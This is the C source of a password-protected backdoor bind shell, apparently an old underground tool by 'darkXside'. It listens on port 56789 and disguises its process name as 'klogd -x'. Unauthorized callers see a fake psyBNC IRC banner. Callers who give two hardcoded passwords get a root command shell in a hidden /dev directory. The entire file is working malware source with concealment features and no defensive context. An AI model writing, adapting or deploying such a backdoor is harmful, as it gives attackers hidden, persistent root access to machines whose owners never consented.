/* simple bindshell that acts like a psybnc 
 * author: darkXside 
 * root@linuxkiddie.org
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <strings.h>
#include <fcntl.h>
#include <pwd.h>

#define password  "q1w2e3r4"
#define password2 "r00tm3"
#define PORT      56789
#define HIDE      "klogd -x"
#define user      "root"
#ifdef  sys
#endif
#define check(pass) strcmp(password, pass)
#define check2(pass2) strcmp(password2, pass2)
#define narf(buf) fgets(buf,256,stdin); if(*buf) buf[strlen(buf)-2]= '\0';
#define sddr struct sockaddr
#define LOG       5

static void box(void);
static void checked(void);
static void command(const char *input);

int r00t = 0, euid = 0;

flushit (char *toflush)
{
  fflush (stdout);
  fflush (stderr);
  fflush (stdin);
 }
int
main(int argc, char **argv)
{


int sockfd, connfd;
struct sockaddr_in servaddr;
struct passwd *pwd;

char pass[256];
char pass2[256];
char buf[246];
char input[80];
if (!geteuid()) {
++r00t;
if ( (pwd = getpwnam(user)) != NULL)
seteuid(euid = pwd->pw_uid);
}
if (fork() != 0)
exit(0);

memset(argv[0], ' ', strlen(argv[0]));
strcpy(argv[0], HIDE);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0);
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(PORT);
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);


if (bind(sockfd, (sddr *)&servaddr, sizeof(servaddr)) < 0)
;

if (listen(sockfd, LOG) < 0);

for (;;) {
if ( (connfd = accept(sockfd, (sddr *)NULL, NULL)) < 0)
continue;

if (fork() != 0) {
dup2(connfd, STDIN_FILENO);
dup2(connfd, STDOUT_FILENO);
dup2(connfd, STDERR_FILENO);

close(connfd);

narf(pass);
if (check(pass) == 0) {
bzero(&pass, sizeof(pass));

printf("\nBackdoor by darkXside\n");
pwd = getpwuid (getuid());
if (pwd == NULL)
printf ("\n");
else
{
printf ("\n");
printf ("Enter the second password.\n");
fflush (stdout);
narf(pass2);
flushit (pass2);
if (check2(pass2) == 0) {
bzero(&pass2, sizeof(pass2));
printf ("\nPassword accepted!\n");
checked();
}
}
}
else
{
printf (":Welcome!psyBNC@lam3rz.de NOTICE * :psyBNC2.3.2-4\n");
exit (0);
}

exit(0);
}
close(connfd);
}
exit(0);
}
static void
box(void)
{

struct utsname buf;
char *dir;
dir = (char *) getcwd(NULL, 0);

printf ("[backdoor]# ");
fflush(stdout);
}

static void
checked(void)
{

char input[256];

chdir("/dev/.tty01");
for (;;) {
box();
narf(input);
seteuid(0);
command(input);
seteuid(euid);
    }
}


static void
command(const char *input)
{
#ifdef sys
char cmd[256];
#endif


if (!strncmp(input, "cd ", 3)) {
if (chdir(input +3) < 0)
perror("chdir");
return ;
}

if (!strcmp(input, "exit")) {
printf("m\nSee ya later...\n");
exit(0);
}



system(input);
}